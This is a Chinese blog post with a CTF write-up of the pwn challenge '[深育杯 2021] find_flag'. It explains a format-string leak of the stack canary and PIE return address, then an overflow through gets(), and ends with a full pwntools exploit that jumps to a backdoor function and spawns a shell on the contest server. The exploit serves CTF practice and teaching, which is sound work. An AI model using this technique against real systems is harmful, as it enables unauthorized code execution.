nssctf-[深育杯 2021]find_flag

最新推荐文章于 2024-08-16 23:08:28 发布
最新推荐文章于 2024-08-16 23:08:28 发布
阅读量274 收藏 5
点赞数 6
分类专栏: pwn百题计划 文章标签: java linux 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73818758/article/details/140136975
版权

首先使用checksec查看文件已开启的保护:

如图所示,保护全开,64位可执行文件。

使用IDA打开,主要代码如下:

unsigned __int64 sub_132F()
{
  char format[32]; // [rsp+0h] [rbp-60h] BYREF
  char v2[56]; // [rsp+20h] [rbp-40h] BYREF
  unsigned __int64 v3; // [rsp+58h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("Hi! What's your name? ");
  gets(format);
  printf("Nice to meet you, ");
  strcat(format, "!\n");
  printf(format);
  printf("Anything else? ");
  gets(v2);
  return __readfsqword(0x28u) ^ v3;
}

变量v3即为我们需要绕过的Canary保护,即在栈溢出时控制还原Canary的值,同时注意程序开启了PIE保护,需要计算程序运行时的真实地址。程序提供了后门函数:

首先利用格式化字符串漏洞泄露出函数地址和Canary地址

unsigned __int64 v3; // [rsp+58h] [rbp-8h]

在printf和gets处打断点,如下图所示,Canary(rbp-8h)即为0x7fffffffdde8

这里我们需要泄露出一个函数或者程序中的地址,由上图所示可以泄露出mov eax, 0的地址。

通过fmtarg泄露出格式化字符串的偏移地址

分别为%17$p和%19$p

可以看到,Canary被存在了ebp的前一个字(8个字节),栈底从format开始,所以从栈底到Canary有(0x60-0x8)/8个字,即第11个字,算上6个参数在寄存器中,Canary会被默认当作第11+6=17个参数。

同理,return_addr被放在ebp后面,是第17+2=19个参数。

然后再利用第二个gets函数栈溢出至后门函数即可,此时就可以开始编写exp了。

from pwn import *
context.log_level = 'debug'
io = remote("node4.anna.nssctf.cn",28116)

payload = '%17$p'+'%19$p'
io.sendlineafter('name? ',payload)
io.recvuntil('Nice to meet you, ')
canary = int(io.recv(18),16)
addr = int(io.recv(14).decode(),16)
main = 0x146f
shell = 0x1228
offset = main-shell
shelladdr = addr-offset

io.recvuntil('Anything else? ')
payload = b'a'*(0x40-8)+p64(canary)+b'a'*8+p64(shelladdr)

io.sendline(payload)
io.interactive()

Wz0beu-淤青
关注
  • 6
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
gcc-linaro-7.3.1-2018.05-x86_64_aarch64-linux-gnu.tar.xz
11-05
标题中的“gcc-linaro-7.3.1-2018.05-x86_64_aarch64-linux-gnu.tar.xz”是一个软件包,它包含了一个特定版本的GCC(GNU Compiler Collection)—— Linaro版的GCC 7.3.1,这个版本是针对2018年5月发布的。...
protoc-gen-grpc-java-1.40.0-osx-aarch_64.exe
09-16
protoc-gen-grpc-java-1.40.0-osx-aarch_64 mac arm芯片平台grpc生成java的支持。官网上面没有,这是基于源码编译生成的。 pom.xml:(protoc-gen-grpc-java-1.40.0.pom) <?xml version="1.0" encoding="UTF-8"?...
新手必看——超详细:[深育杯 2021]find_flag
IT_huanhuan的博客
06-09 947
pie与canary同时开启,并且有格式化字符串。
【PWN · ret2text & 格式化字符串漏洞 | NX | Canary | PIE】[深育杯 2021]find_flag
Mr_Fmnwon的博客
06-09 1815
Canary、PIE开启,如何进行绕过呢?【PWN · ret2text | PIE 】[NISACTF 2022]ezpie_Mr_Fmnwon的博客-CSDN博客【PWN · ret2libc | Canary】[2021 鹤城杯]littleof_Mr_Fmnwon的博客-CSDN博客而本题也无外乎这两个要点,然而还是让本蒟蒻感到头疼QAQ(一点睡,六点半起,一整个学期伤身体,ICU里喝小米)本题是遇到的第一道保护全开的题目,各种保护让人头大,对各种漏洞的综合利用也有更高的要求,加油!
[深育杯 2021]find_flag wp(绕过PIE和canary 格式化字符串 栈溢出 )
qq_73667990的博客
06-28 610
直接跳到格式化字符串漏洞处,然后查看栈结构,rbp上下分别是canary和返回地址。所以我们要输入0x40-0x8来把v2到canary填充完,然后再原封不动的输入canary,然后再输入0x8个a填充rbp指针,然后再输入后门函数地址覆盖返回地址。所以我们栈的第一个位置其实是rdi,所以canary和return的位置分别为17和19,我们输入。开了canary保护,栈溢出时,要还原canary,开了PIE,地址会改变。有了返回地址,我们减去偏移就能得到程序基地址,返回地址偏移为0x146F。
2021深育杯线上初赛官方WriteUp
热门推荐
further_eye的博客
11-18 1万+
Web EasySQL 访问robots.txt,可得三个文件index.php、config.php、helpyou2findflag.php。 fuzz黑名单,可发现select、单双引号、括号、分号、set、show、variables、等都没有过滤。 经测试可得到闭合方式为括号,且白名单为数据库记录行数,使用1);{sqlinject}-- +可以闭合查询语句并进行堆叠注入。 show variables like '%slow_query_log%'; # 查询慢日志记录是否开启 setgloba
2021深育杯-网络安全大赛专业竞赛部分wp
七堇年的博客
12-23 2353
2021深育杯-网络安全大赛专业竞赛
深育杯 2021 高校组 CTF 网络安全大赛 专业竞赛 真题 zip
12-07
深育杯 2021 高校组 CTF 网络安全大赛 专业竞赛 真题
searchjmp-esp-ebx.rar_find jmp esp isno
09-23
本文将深入探讨"searchjmp-esp-ebx.rar_find jmp esp isno"这一程序的功能、用途及其背后的原理。 标题"searchjmp-esp-ebx.rar_find jmp esp isno"表明这是一个用于搜索特定进程中的"JMP ESP"和"JMP EBX"指令的小...
Find-Object-0.5.1-Source.zip_find object
09-24
《Find-Object 0.5.1 源代码解析及应用探析》 在IT领域,源代码是理解软件工作原理的关键。今天我们将深入探讨一个名为"Find-Object"的开源项目,版本号为0.5.1。这个项目的重点在于对象查找功能,对于开发者来说,...
NSSCTF 刷题记录
红叶的博客
03-07 1014
本篇文章主要写几个值得记一笔的题目,其他题目都是类似换皮。
[深育杯 2021]---Disk
pop_cheng的博客
11-21 299
...............
2021湖湘杯web部分wp
fmyyy1的博客
11-14 1866
前言 快期末了这学期准备退役了,下学期继续努力(大二课怎么这么多啊!!!期末考怎么办啊!!!一节课没听啊!!!) 今天上线看看题 easywill 这题没啥好说,跟tp3的rce差不多 直接 ?name=cfile&value=/etc/passwd 就能文件包含,之后找不到flag,用拟态的的那个包含pearcmd.php就能getshell Pentest in Autumn 下个pom.xml附件 看到shiro <?xml version="1.0" encoding="UTF-8"
JAVA进阶补充
2301_80150315的博客
08-15 735
概念:把已经有的方法拿过来用,当作函数式接口中抽象方法的方法体条件:引用处必须是函数式接口被引用的方法需要已经存在被引用方法的形参和返回值需要跟抽象方法的形参和返回值保持一致被引用方法的功能需要满足当前需求:方法引用符意义:就是为让控制台的报错信息更加的见名知意自定义异常的步骤:定义异常类写继承关系空参构造带参构造​file对象就表示一个路径,可以是文件的路径、也可以是文件夹的路径;这个路径可以是存在的,也允许是不存在的构造方法描述根据文件路径创建对象。
进程间通信 ---共享内存
BUG制造机的博客
08-14 884
在这篇文章中向大家介绍了共享内存的原理以及常用的指令函数,希望大家有所收获!😁。
手撕快排——三种实现方法(附动图及源码)
最新发布
jsjs1346的博客
08-16 522
🤖💻👨‍💻👩‍💻🌟🚀🤖🌟👨‍💻👩‍💻👨‍💻👩‍💻🚀是一种高效的排序算法,广泛应用于各种场景。它采用策略,将一个数组分成两个子数组,然后递归地对这两个子数组进行排序。本文将介绍三种快速排序的实现方法,并附上相应的源码。⚙️一、快速排序的基本原理一个基准元素(pivot)分成两个子数组递归合并O(n log n)O(n log n)O(n^2)后文我们将给出优化方案O(log n)📚三、实现霍尔方法是快速排序原始版本中使用的分区方法。
Java Spring|day3.SpringBoot
weixin_60364343的博客
08-15 258
告诉Spring boot需要什么功能,它就能引入需要的依赖库起步依赖就是特殊的Maven依赖,利用了传递依赖解析,把常用库聚合在一起,组成几个为特定功能而定制的依赖。
mybatis-plus使用find_in_set
07-28
Mybatis-plus使用find_in_set函数可以实现对字段中包含指定值的查询。在使用lambda表达式拼接SQL时,可以通过apply方法来使用find_in_set函数。具体的代码示例如下: ```java List<String> realIds = crmProgrammeService.getIdsByRealEstateNames(name); if (!CollectionUtils.isEmpty(realIds)){ if (realIds.size() == 1){ queryWrapper.like("real_estate_ids", realIds.get(0)); } else { for (int i = 0; i < realIds.size(); i++) { if (i == 0) { queryWrapper.apply(null != realIds.get(i), "(find_in_set({0},real_estate_ids)", realIds.get(i)); } else { if (i == realIds.size() - 1) { queryWrapper.or().apply(null != realIds.get(i), "find_in_set({0},real_estate_ids))", realIds.get(i)); } else { queryWrapper.or().apply(null != realIds.get(i), "find_in_set({0},real_estate_ids)", realIds.get(i)); } } } } } else { queryWrapper.isNull("real_estate_ids"); } ``` 以上代码中,通过apply方法传入find_in_set函数的参数,实现了对real_estate_ids字段进行查询。具体的SQL语句如下: ```sql SELECT * FROM `crm_programme` where find_in_set(1,real_estate_ids) or find_in_set(3,real_estate_ids); ``` 这条SQL语句会查询crm_programme表中real_estate_ids字段包含1或3的记录。\[1\]\[2\] #### 引用[.reference_title] - *1* *2* [记录 mybatis plus QuerWapper使用 FIND_IN_SET](https://blog.csdn.net/qq_34410726/article/details/126561485)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [mybatis-plus中使用FIND_IN_SET函数](https://blog.csdn.net/qq_41289165/article/details/116115674)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值